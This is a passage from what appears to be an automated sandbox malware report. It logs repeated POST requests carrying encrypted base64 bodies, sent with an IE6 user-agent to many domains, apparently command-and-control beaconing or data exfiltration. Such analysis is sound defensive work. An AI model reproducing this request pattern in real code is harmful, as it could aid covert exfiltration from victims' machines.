46 36 74 66 36 43 4c 56 4d 64 6a 31 35 59 35 6b 72 65 66 67 56 48 32 76 76 66 6e 74 4c 42 35 63 69 50 37 35 7a 75 48 4b 4c 43 55 64 6e 42 55 71 7a 2b 36 55 71 58 34 53 74 65 32 4a 4a 35 51 66 51 66 61 73 53 62 42 34 6a 39 77 37 51 4a 59 65 47 73 51 66 46 2b 52 76 69 66 5a 32 74 78 6e 75 7a 4d 59 56 36 56 64 6b 57 6a 50 31 41 51 70 58 36 75 6b 42 7a 72 44 31 4a 50 4f 57 74 44 73 32 44 63 4a 6a 48 6a 48 6a 42 53 52 32 6f 6b 66 52 74 47 55 61 2b 62 41 6a 51 58 48 45 41 4d 30 35 48 42 51 6b 66 57 42 41 2b 6e 34 37 62 47 78 63 75 4d 4a 34 6f 42 58 73 58 79 66 7a 6e 4a 53 46 4b 75 57 64 4a 37 53 59 79 66 75 4c 54 48 50 4d 5a 59 32 4f 37 72 6b 49 63 30 68 39 79 32 31 6f 32 64 43 4e 59 5a 5a 6f 39 79 36 38 6e 56 6e 4e 79 2b 37 4f 55 54 38 71 4d 73 57 51 51 52 74 53 56 4b 39 68 43 6e 49 73 6a 6a 75 50 4b 68 64 4a 4e 4d 41 63 6a 37 45 55 71 78 7a 30 48 44 46 39 55 41 6c 34 4c 4b 52 79 76 6a 70 65 74 5a 6a 72 4d 71 6e 70 57 35 6a 52 35 58 76 70 4a 6b 4e 34 67 48 49 59 Data Ascii: 1z+41WpsP5onMQp2TbAz7S3RVCOaXC1zPsXTOzPJUNLESA73m/PPUtu5ARxp8wYzsO91Ea28he82JM8lyUShL8N4P+5csQt0J7Rju7TIi+W76af+ljj7IXPCSOJPUIopcAygKMrXaOx0askoJSuqC2Y2p1dVQhw12Elxb2vLcgmg/EzuhnqqJasdBMJvVerV67OHrd6nLG5PvQSt5WPF4SWV7LkJZVajkqNfrrKSEIFhQLeAF6tf6CLVMdj15Y5krefgVH2vvfntLB5ciP75zuHKLCUdnBUqz+6UqX4Ste2JJ5QfQfasSbB4j9w7QJYeGsQfF+RvifZ2txnuzMYV6VdkWjP1AQpX6ukBzrD1JPOWtDs2DcJjHjHjBSR2okfRtGUa+bAjQXHEAM05HBQkfWBA+n47bGxcuMJ4oBXsXyfznJSFKuWdJ7SYyfuLTHPMZY2O7rkIc0h9y21o2dCNYZZo9y68nVnNy+7OUT8qMsWQQRtSVK9hCnIsjjuPKhdJNMAcj7EUqxz0HDF9UAl4LKRyvjpetZjrMqnpW5jR5XvpJkN4gHIY
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 6e 31 4f 56 46 4e 59 6c 79 39 4a 70 65 34 74 2b 73 53 4f 35 6b 33 6b 4a 31 66 46 32 4d 49 71 46 61 6e 39 54 78 33 42 63 64 33 70 6b 38 58 6d 50 34 2b 37 63 75 58 62 63 47 70 50 51 55 79 62 44 79 65 58 65 55 53 36 6f 36 54 70 6d 4f 56 45 46 45 64 46 54 69 44 56 47 76 78 37 33 6f 6a 5a 34 73 4b 36 75 4f 46 75 51 61 44 41 66 6e 4a 33 32 41 49 36 73 4a 76 59 45 30 34 68 47 66 76 31 38 47 4a 77 61 54 6b 72 2f 77 74 51 59 67 35 66 61 78 72 6e 79 33 6f 37 4a 4b 4d 2b 64 52 37 62 72 6e 64 44 38 6d 37 33 55 72 72 6a 70 31 65 48 4c 36 59 76 48 46 63 75 49 6e 4f 63 39 2b 6c 4e 38 7a 34 35 34 77 75 35 43 77 7a 75 39 67 77 49 52 76 65 58 67 50 39 58 2f 39 37 59 6c 63 71 64 4c 4f 55 62 6a 34 4d 70 39 61 36 52 55 37 33 31 67 56 37 42 36 2f 50 4c 67 6c 56 67 64 61 57 76 66 63 33 5a 50 34 4c 6f 59 4f 37 4c 69 59 58 59 53 41 6b 72 2f 65 71 66 6b 7a 61 43 7a 44 42 61 51 55 42 35 48 70 6f 38 35 6e 71 66 6e 55 59 2f 6a 63 6e 66 55 7a 36 4b 66 69 4c 6a 74 43 70 31 70 35 68 4a 47 7a 33 75 32 32 6f 6c 46 68 4b 77 44 63 33 42 74 76 34 53 43 51 7a 68 79 6c 32 35 45 4a 6b 54 6d 5a 71 4e 76 6e 31 33 7a 4e 30 76 79 58 63 65 38 50 75 52 50 50 62 62 63 77 73 76 5a 70 36 79 69 33 57 4c 62 2b 6e 6f 4d 77 74 62 55 52 51 55 47 58 36 50 65 41 43 6c 76 50 4a 69 78 76 53 6f 4d 4f 65 58 31 32 2f 6b 44 5a 53 65 38 44 31 7a 75 6c 33 32 2f 66 38 2f 6b 75 45 76 48 74 42 52 4b 66 39 76 33 45 55 37 48 51 6c 55 76 4f 76 6d 55 62 6e 67 4a 32 36 5a 35 62 48 41 44 4a 71 52 44 39 5a 4b 6f 48 41 49 5a 55 71 68 78 56 78 31 58 42 47 7a 67 41 2b 62 70 72 75 79 69 5a 76 71 63 44 48 70 43 49 48 35 67 30 33 41 70 59 46 30 4b 41 46 37 34 31 44 48 50 74 7a 36 4a 44 6e 6b 57 52 4c 4e 72 41 34 47 2b 33 5a 2b 67 6a 76 55 63 55 58 42 6c 64 36 42 4e 35 70 48 67 76 4d 73 64 4e 53 2f 56 6c 4c 41 3d Data Ascii: n1OVFNYly9Jpe4t+sSO5k3kJ1fF2MIqFan9Tx3Bcd3pk8XmP4+7cuXbcGpPQUybDyeXeUS6o6TpmOVEFEdFTiDVGvx73ojZ4sK6uOFuQaDAfnJ32AI6sJvYE04hGfv18GJwaTkr/wtQYg5faxrny3o7JKM+dR7brndD8m73Urrjp1eHL6YvHFcuInOc9+lN8z454wu5Cwzu9gwIRveXgP9X/97YlcqdLOUbj4Mp9a6RU731gV7B6/PLglVgdaWvfc3ZP4LoYO7LiYXYSAkr/eqfkzaCzDBaQUB5Hpo85nqfnUY/jcnfUz6KfiLjtCp1p5hJGz3u22olFhKwDc3Btv4SCQzhyl25EJkTmZqNvn13zN0vyXce8PuRPPbbcwsvZp6yi3WLb+noMwtbURQUGX6PeAClvPJixvSoMOeX12/kDZSe8D1zul32/f8/kuEvHtBRKf9v3EU7HQlUvOvmUbngJ26Z5bHADJqRD9ZKoHAIZUqhxVx1XBGzgA+bpruyiZvqcDHpCIH5g03ApYF0KAF741DHPtz6JDnkWRLNrA4G+3Z+gjvUcUXBld6BN5pHgvMsdNS/VlLA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 4f 37 52 66 56 4f 37 6e 78 4e 49 41 4b 48 73 6e 2b 59 34 56 43 31 48 50 74 6b 78 75 4b 46 55 45 41 74 64 47 74 7a 4e 43 2f 6f 67 39 4c 52 57 35 37 6e 38 39 77 42 78 4d 65 58 31 4b 4c 51 34 63 72 6c 63 72 59 78 5a 48 4b 61 54 70 43 47 55 4d 44 39 42 56 38 36 69 42 4b 69 4f 31 47 58 56 63 57 65 39 76 6e 69 7a 36 69 4e 51 49 6c 70 37 46 5a 67 6d 48 56 76 36 49 64 57 77 72 74 59 6b 78 79 72 6e 64 6c 79 4e 4b 35 76 75 30 71 48 7a 4b 61 55 4a 66 4a 61 62 36 47 53 63 57 54 2b 57 2b 2b 73 46 35 6d 61 2b 39 4e 38 30 72 4f 72 37 2b 61 6c 6a 66 6f 54 31 37 50 52 6d 42 30 36 6b 64 68 35 57 39 4e 56 66 4e 33 66 59 77 6c 79 31 62 41 4b 35 48 32 4a 46 79 76 55 34 55 39 6a 64 31 55 51 71 48 4e 73 6a 68 75 70 6d 63 51 47 44 68 77 4e 51 59 50 62 62 4e 53 51 67 33 6e 70 50 42 50 61 59 57 6b 74 2f 77 57 50 35 62 6d 54 39 43 2f 58 4d 34 68 62 63 54 79 6b 66 5a 46 72 47 4a 44 57 73 39 6e 55 75 67 7a 6d 4f 64 76 38 41 47 53 64 68 30 66 42 57 43 47 38 58 6e 38 36 73 46 71 72 62 45 33 6e 70 32 59 4f 31 54 46 5a 36 54 37 6d 42 67 72 32 59 4b 52 56 2f 37 7a 32 64 64 44 4b 62 58 75 51 79 49 52 72 61 39 34 64 51 2b 73 73 4d 6f 57 38 65 75 79 45 41 78 56 58 53 49 43 32 77 53 6a 47 4a 34 65 48 56 44 2b 6a 61 58 71 34 51 51 67 31 6d 44 72 6b 62 59 73 6e 64 34 6f 74 52 47 65 50 48 62 42 42 49 4f 51 2f 2b 78 63 37 4c 6e 42 50 53 78 6a 36 4e 57 45 47 68 4d 37 45 62 5a 6a 49 72 56 51 53 6a 75 44 38 2b 54 75 56 32 4d 39 64 39 65 70 79 72 38 48 58 52 2f 53 6d 6a 37 42 44 6a 37 52 46 6c 77 2b 74 6b 71 79 39 67 42 70 78 34 57 51 66 76 34 63 56 44 34 57 54 61 61 68 6b 64 62 44 41 4d 62 55 49 72 39 35 59 6a 63 70 42 4f 65 52 68 65 65 4d 4a 6c 42 4c 62 4e 75 33 6d 6c 4d 4f 73 5a 32 73 39 39 6b 76 45 73 47 4e 49 31 36 45 78 7a 77 2b 33 50 68 68 43 57 59 32 6c 4d 31 31 48 67 30 56 47 34 3d Data Ascii: O7RfVO7nxNIAKHsn+Y4VC1HPtkxuKFUEAtdGtzNC/og9LRW57n89wBxMeX1KLQ4crlcrYxZHKaTpCGUMD9BV86iBKiO1GXVcWe9vniz6iNQIlp7FZgmHVv6IdWwrtYkxyrndlyNK5vu0qHzKaUJfJab6GScWT+W++sF5ma+9N80rOr7+aljfoT17PRmB06kdh5W9NVfN3fYwly1bAK5H2JFyvU4U9jd1UQqHNsjhupmcQGDhwNQYPbbNSQg3npPBPaYWkt/wWP5bmT9C/XM4hbcTykfZFrGJDWs9nUugzmOdv8AGSdh0fBWCG8Xn86sFqrbE3np2YO1TFZ6T7mBgr2YKRV/7z2ddDKbXuQyIRra94dQ+ssMoW8euyEAxVXSIC2wSjGJ4eHVD+jaXq4QQg1mDrkbYsnd4otRGePHbBBIOQ/+xc7LnBPSxj6NWEGhM7EbZjIrVQSjuD8+TuV2M9d9epyr8HXR/Smj7BDj7RFlw+tkqy9gBpx4WQfv4cVD4WTaahkdbDAMbUIr95YjcpBOeRheeMJlBLbNu3mlMOsZ2s99kvEsGNI16Exzw+3PhhCWY2lM11Hg0VG4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.railbook.netCache-Control: no-cacheCookie: __tad=1690487570.4056824Data Raw: 34 51 59 72 4e 31 78 46 7a 4e 4a 4b 55 70 53 33 68 79 46 74 47 75 38 41 4e 30 6c 30 68 61 49 6f 55 41 53 2b 5a 79 48 34 37 71 4a 65 68 67 58 50 78 43 6a 78 49 54 6d 50 51 4d 4f 64 55 5a 72 58 57 6a 51 7a 56 64 6e 4f 2f 2b 64 47 70 56 6d 51 2f 54 35 57 6c 67 68 48 6b 54 6e 46 4c 48 34 39 44 76 30 4c 71 33 2b 6f 42 35 4a 72 39 4d 68 65 45 75 39 72 34 7a 54 63 72 34 44 65 74 4a 35 46 49 48 58 50 61 48 7a 7a 30 45 50 61 36 62 38 37 6f 31 61 64 37 76 34 2b 47 6a 39 54 76 58 41 73 50 69 59 41 48 73 43 59 6b 61 74 58 52 36 63 73 47 49 46 4d 61 62 70 4d 70 6b 71 38 37 41 2f 4d 57 63 58 45 4f 52 63 35 41 61 4a 56 71 30 5a 64 59 32 33 77 65 68 4d 67 46 7a 54 68 77 4e 70 64 50 42 6b 6c 32 36 30 49 32 54 66 33 43 77 34 63 54 75 55 7a 76 46 42 38 64 67 57 53 72 4c 4e 71 53 6e 43 34 35 57 31 50 6f 72 64 72 68 75 7a 34 77 36 56 77 75 7a 71 46 33 6c 39 52 4c 4b 2b 39 6e 32 45 68 55 6f 4c 78 79 66 75 4b 5a 43 48 53 35 68 42 77 4f 67 39 56 44 76 51 62 70 4d 53 2f 62 59 32 74 46 4d 2f 33 55 74 6f 33 66 52 34 34 4e 68 75 63 58 4d 6f 43 77 65 48 57 75 74 69 47 4d 61 39 41 6e 6a 64 4f 58 4c 78 43 4d 37 45 53 75 45 35 4d 59 4d 53 33 4b 56 74 38 53 62 70 4a 4b 70 53 4a 76 58 56 30 74 46 61 77 4f 50 65 59 34 68 71 45 6d 61 76 31 73 45 77 4a 48 55 7a 4d 6c 2f 4c 51 42 45 73 42 70 50 31 52 43 63 78 70 63 48 48 64 52 58 34 48 32 4c 32 73 61 6e 74 7a 59 45 69 6d 74 53 52 6e 66 6b 34 74 56 52 47 73 56 37 65 6f 41 37 34 78 46 4b 51 53 49 62 43 35 4a 71 32 73 49 44 55 48 78 72 64 46 38 6e 58 74 4c 4f 78 75 34 33 32 47 41 68 62 4a 45 67 71 55 41 69 6a 68 4d 7a 6f 68 5a 76 73 76 78 31 37 39 63 36 5a 57 Data Ascii: 4QYrN1xFzNJKUpS3hyFtGu8AN0l0haIoUAS+ZyH47qJehgXPxCjxITmPQMOdUZrXWjQzVdnO/+dGpVmQ/T5WlghHkTnFLH49Dv0Lq3+oB5Jr9MheEu9r4zTcr4DetJ5FIHXPaHzz0EPa6b87o1ad7v4+Gj9TvXAsPiYAHsCYkatXR6csGIFMabpMpkq87A/MWcXEORc5AaJVq0ZdY23wehMgFzThwNpdPBkl260I2Tf3Cw4cTuUzvFB8dgWSrLNqSnC45W1Pordrhuz4w6VwuzqF3l9RLK+9n2EhUoLxyfuKZCHS5hBwOg9VDvQbpMS/bY2tFM/3Uto3fR44NhucXMoCweHWutiGMa9AnjdOXLxCM7ESuE5MYMS3KVt8SbpJKpSJvXV0tFawOPeY4hqEmav1sEwJHUzMl/LQBEsBpP1RCcxpcHHdRX4H2L2santzYEimtSRnfk4tVRGsV7eoA74xFKQSIbC5Jq2sIDUHxrdF8nXtLOxu432GAhbJEgqUAijhMzohZvsvx179c6ZW
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 42 65 41 6b 70 34 55 34 32 4e 4a 4c 48 45 69 43 72 4e 44 72 6e 50 35 47 64 58 78 54 5a 73 67 45 69 66 31 4f 6c 6f 6d 34 35 41 55 45 31 79 65 50 51 58 54 43 55 70 4c 54 47 53 6a 39 51 7a 4e 2b 61 4f 45 66 54 33 6a 4b 6c 66 50 4c 68 46 38 76 32 2f 70 4f 73 49 37 50 6a 4b 45 6f 6a 75 36 34 70 6a 37 63 6b 4e 78 47 44 77 34 62 43 4a 67 4c 76 6b 61 54 66 34 57 64 2f 50 6a 42 76 55 61 31 66 35 69 48 74 57 79 50 37 64 39 37 4a 66 5a 46 64 38 72 35 35 59 34 30 74 77 43 6e 4c 57 41 34 64 71 4b 79 73 6b 46 72 78 56 41 47 62 56 63 41 58 71 43 34 7a 58 46 46 69 34 68 59 48 55 4a 38 55 56 63 47 6f 58 64 66 6e 58 53 42 50 45 63 68 6c 32 52 6e 5a 45 61 51 47 6a 54 46 62 47 42 65 6a 4a 46 37 30 48 31 73 6e 70 51 56 2b 33 33 74 79 58 42 75 67 61 59 70 44 45 76 32 41 6c 36 57 58 78 52 78 4a 34 63 39 31 76 62 5a 49 45 33 53 51 34 41 41 68 4d 2f 35 45 56 38 65 68 73 2f 34 43 55 6a 53 63 6c 41 37 79 73 4a 5a 51 6d 42 57 61 38 2f 78 45 39 61 75 32 34 68 72 50 2b 32 69 61 53 67 52 76 47 2f 76 59 49 51 45 42 71 2f 4c 73 42 4f 37 31 48 48 32 4a 36 2b 6a 36 5a 4d 4f 37 4d 34 43 67 30 72 32 30 63 54 61 37 35 6e 2b 33 43 51 7a 58 6b 61 34 31 63 52 76 61 6f 53 46 78 64 32 36 56 46 69 51 71 53 6d 4d 6d 37 4f 6a 61 45 4f 44 39 56 58 34 32 32 2f 77 37 7a 69 44 69 34 65 67 38 71 79 63 30 50 36 78 43 6c 66 73 72 36 39 58 30 30 43 45 6b 51 44 45 38 61 4c 61 74 43 56 66 44 77 63 6d 6e 56 51 52 31 77 69 2f 6b 59 6d 44 44 67 62 2b 52 69 49 43 54 73 46 78 31 66 2f 72 50 6e 54 52 72 37 57 4c 64 35 48 2f 67 59 72 38 75 79 55 43 4d 6e 70 50 31 41 58 35 2b 56 34 42 6e 4b 70 76 35 45 32 76 4b 44 36 48 48 50 44 51 77 61 53 6b 58 74 6b 78 35 50 37 4e 32 48 68 49 4c 33 31 36 4c 51 3d 3d Data Ascii: BeAkp4U42NJLHEiCrNDrnP5GdXxTZsgEif1Olom45AUE1yePQXTCUpLTGSj9QzN+aOEfT3jKlfPLhF8v2/pOsI7PjKEoju64pj7ckNxGDw4bCJgLvkaTf4Wd/PjBvUa1f5iHtWyP7d97JfZFd8r55Y40twCnLWA4dqKyskFrxVAGbVcAXqC4zXFFi4hYHUJ8UVcGoXdfnXSBPEchl2RnZEaQGjTFbGBejJF70H1snpQV+33tyXBugaYpDEv2Al6WXxRxJ4c91vbZIE3SQ4AAhM/5EV8ehs/4CUjSclA7ysJZQmBWa8/xE9au24hrP+2iaSgRvG/vYIQEBq/LsBO71HH2J6+j6ZMO7M4Cg0r20cTa75n+3CQzXka41cRvaoSFxd26VFiQqSmMm7OjaEOD9VX422/w7ziDi4eg8qyc0P6xClfsr69X00CEkQDE8aLatCVfDwcmnVQR1wi/kYmDDgb+RiICTsFx1f/rPnTRr7WLd5H/gYr8uyUCMnpP1AX5+V4BnKpv5E2vKD6HHPDQwaSkXtkx5P7N2HhIL316LQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1690487546.7645209Data Raw: 6d 48 4e 56 67 44 2b 58 56 5a 6f 76 76 68 68 37 48 72 73 78 38 73 69 6e 38 36 71 56 48 48 30 76 34 33 4b 30 42 49 70 65 6d 4e 65 58 4b 56 79 34 6f 4d 30 46 7a 38 49 64 38 77 50 4e 46 6b 79 52 54 4c 50 70 2b 64 4b 5a 78 50 43 52 6e 50 61 76 55 66 6d 72 34 48 2b 4d 55 56 61 75 43 64 55 64 42 55 7a 35 64 32 2f 58 47 41 2f 5a 75 57 49 77 65 75 43 37 41 59 6d 4c 67 51 57 75 4b 68 75 57 77 6f 32 70 6c 6a 56 71 44 61 36 33 77 2b 48 55 77 6b 2b 57 4e 7a 2f 58 4f 30 35 59 54 35 74 48 44 45 65 45 47 53 56 6c 62 76 4b 73 4b 42 41 6b 46 4b 5a 50 6f 44 6a 73 34 49 2b 4d 51 32 2f 2f 47 46 6e 41 57 62 51 70 70 50 6b 6e 76 51 44 2f 75 61 47 56 44 59 31 45 36 4f 78 64 6e 4a 58 68 4f 6c 4c 72 36 2f 67 61 4e 4e 48 36 76 69 77 55 51 6f 37 4c 58 42 74 69 32 49 59 6a 48 4e 34 77 47 5a 35 4a 76 66 74 62 59 69 61 59 73 4d 71 2b 55 2f 44 31 54 32 70 61 61 61 6c 54 4a 55 44 67 4a 33 4a 53 6e 4c 72 41 34 6c 64 71 4b 58 70 54 32 51 55 6e 44 34 77 74 48 4a 39 5a 39 44 56 33 4e 47 4e 78 36 4f 6a 65 6c 46 70 6a 67 66 6f 4a 53 4e 69 78 56 5a 74 77 31 2b 46 57 4c 30 39 63 68 5a 45 2f 4e 75 55 66 4a 4e 76 5a 4c 50 6b 32 52 34 4b 7a 68 32 49 39 61 58 54 38 45 4e 56 53 68 4f 71 48 7a 46 4f 51 69 47 75 6c 57 2f 71 4b 61 67 52 54 44 51 39 4f 6d 64 6c 6a 63 69 32 6c 37 5a 79 38 31 6f 37 32 75 66 31 59 45 52 70 70 39 44 76 2b 64 61 4d 2f 4f 66 6e 77 56 4b 57 6c 5a 46 63 30 47 71 76 67 2f 43 54 70 65 68 72 2f 33 48 6a 43 43 37 73 55 4a 51 2f 32 73 71 4d 62 45 75 50 5a 6a 33 47 42 54 70 4b 66 39 4f 45 69 5a 42 4f 52 77 52 59 45 61 64 34 63 7a 47 37 6c 4a 35 31 30 4f 56 76 36 64 51 59 73 53 30 49 30 62 52 32 72 41 37 6b 62 32 39 55 43 30 43 74 50 50 70 49 5a 55 46 37 6e 74 61 51 2f 78 6e 38 47 58 38 35 6f 46 69 4f 66 33 7a 47 67 39 38 66 67 4c 75 6e 50 68 4c 44 55 4c 6c 73 3d Data Ascii: mHNVgD+XVZovvhh7Hrsx8sin86qVHH0v43K0BIpemNeXKVy4oM0Fz8Id8wPNFkyRTLPp+dKZxPCRnPavUfmr4H+MUVauCdUdBUz5d2/XGA/ZuWIweuC7AYmLgQWuKhuWwo2pljVqDa63w+HUwk+WNz/XO05YT5tHDEeEGSVlbvKsKBAkFKZPoDjs4I+MQ2//GFnAWbQppPknvQD/uaGVDY1E6OxdnJXhOlLr6/gaNNH6viwUQo7LXBti2IYjHN4wGZ5JvftbYiaYsMq+U/D1T2paaalTJUDgJ3JSnLrA4ldqKXpT2QUnD4wtHJ9Z9DV3NGNx6OjelFpjgfoJSNixVZtw1+FWL09chZE/NuUfJNvZLPk2R4Kzh2I9aXT8ENVShOqHzFOQiGulW/qKagRTDQ9Omdljci2l7Zy81o72uf1YERpp9Dv+daM/OfnwVKWlZFc0Gqvg/CTpehr/3HjCC7sUJQ/2sqMbEuPZj3GBTpKf9OEiZBORwRYEad4czG7lJ510OVv6dQYsS0I0bR2rA7kb29UC0CtPPpIZUF7ntaQ/xn8GX85oFiOf3zGg98fgLunPhLDULls=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWk1MSy1KcEcxblpSTGwyUFJGNUhld0FBQUJzIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaTUxLLUpwRzFuWlJMbDJQUkY1SGV3QUFBQnMiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU1NiIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiODQuMTcuNTIuNDMiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjYwNzc0IiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY5MDQ4NzU0OC41MDc5MDksIlJFUVVFU1RfVElNRSI6MTY5MDQ4NzU0OCwiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6Ijg0LjE3LjUyLjQzIn0%3D
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 4e 75 37 71 74 39 49 46 61 4a 70 38 71 78 41 41 68 65 75 4b 46 39 56 36 41 37 77 69 35 6e 54 33 4a 72 6c 6e 48 34 34 4f 4d 4c 41 61 64 33 55 48 31 6b 41 66 34 62 45 68 61 45 6b 35 70 35 69 4c 7a 33 37 66 6a 42 43 33 38 69 69 64 43 64 36 58 46 50 4f 4d 30 55 72 63 2b 64 4d 4d 51 33 7a 5a 65 4a 44 76 52 70 4a 52 48 42 54 58 6b 59 33 4d 53 56 47 36 58 79 72 32 55 2f 54 51 5a 50 66 45 45 50 2b 55 51 74 61 47 74 36 4f 53 54 4b 67 54 57 70 64 7a 4b 47 31 68 73 6c 37 73 4f 43 79 43 45 45 48 36 59 64 38 31 5a 36 67 7a 77 33 2f 6a 4b 33 39 68 64 43 78 34 48 51 6f 44 57 55 6f 46 63 78 38 64 74 32 6f 79 6c 6f 39 4a 6d 34 63 73 77 4f 52 64 73 35 53 72 69 68 36 78 4b 58 4f 59 4e 2f 65 43 44 4e 74 53 6c 59 48 57 55 54 6f 4b 50 33 6d 79 73 37 2b 4b 4b 6a 50 41 55 61 54 46 33 67 2b 6d 76 52 6d 48 46 6c 50 63 53 6e 45 52 65 61 42 44 42 76 4e 62 4d 4f 6a 35 51 54 55 4e 30 4b 61 72 6c 6b 45 4e 5a 59 54 76 6e 2b 59 6b 6b 78 34 37 38 50 71 69 5a 7a 55 50 71 56 2b 6f 30 50 45 72 75 46 38 43 59 4f 56 45 6f 47 4e 77 31 33 45 54 65 6d 2f 31 64 68 47 2f 6a 4e 5a 2b 67 49 6f 78 44 58 5a 42 76 78 6b 45 70 55 2b 47 43 48 73 50 70 30 72 7a 57 31 39 64 6e 39 6d 64 78 67 4c 6e 2f 63 34 45 54 34 64 48 62 55 50 35 4c 71 44 59 46 65 72 4a 55 53 58 6d 68 6b 46 6a 4f 4c 74 51 64 61 74 42 75 34 64 6e 56 6c 74 2f 50 54 43 79 78 51 36 33 69 49 59 33 63 71 53 6e 41 6f 42 63 72 42 39 61 57 46 38 6b 72 57 33 67 2b 6e 2f 6c 4f 35 30 46 57 4b 49 49 64 4f 59 45 6c 6b 4d 4d 50 39 59 33 67 71 6d 62 6b 4c 6f 46 54 2f 46 78 65 64 4f 4e 70 58 44 4d 75 74 62 49 35 58 52 30 49 39 6f 64 35 49 55 63 71 63 38 2f 4c 46 6c 41 72 31 68 4e 66 33 65 36 63 61 59 39 70 37 34 71 42 35 4c 4c 49 33 62 59 41 6e 47 4e 34 34 57 4a 65 69 38 46 33 6d 64 37 55 63 67 41 34 6a 33 4a 61 38 69 31 6b 72 58 5a 42 4d 47 49 70 69 51 3d Data Ascii: Nu7qt9IFaJp8qxAAheuKF9V6A7wi5nT3JrlnH44OMLAad3UH1kAf4bEhaEk5p5iLz37fjBC38iidCd6XFPOM0Urc+dMMQ3zZeJDvRpJRHBTXkY3MSVG6Xyr2U/TQZPfEEP+UQtaGt6OSTKgTWpdzKG1hsl7sOCyCEEH6Yd81Z6gzw3/jK39hdCx4HQoDWUoFcx8dt2oylo9Jm4cswORds5Srih6xKXOYN/eCDNtSlYHWUToKP3mys7+KKjPAUaTF3g+mvRmHFlPcSnEReaBDBvNbMOj5QTUN0KarlkENZYTvn+Ykkx478PqiZzUPqV+o0PEruF8CYOVEoGNw13ETem/1dhG/jNZ+gIoxDXZBvxkEpU+GCHsPp0rzW19dn9mdxgLn/c4ET4dHbUP5LqDYFerJUSXmhkFjOLtQdatBu4dnVlt/PTCyxQ63iIY3cqSnAoBcrB9aWF8krW3g+n/lO50FWKIIdOYElkMMP9Y3gqmbkLoFT/FxedONpXDMutbI5XR0I9od5IUcqc8/LFlAr1hNf3e6caY9p74qB5LLI3bYAnGN44WJei8F3md7UcgA4j3Ja8i1krXZBMGIpiQ=
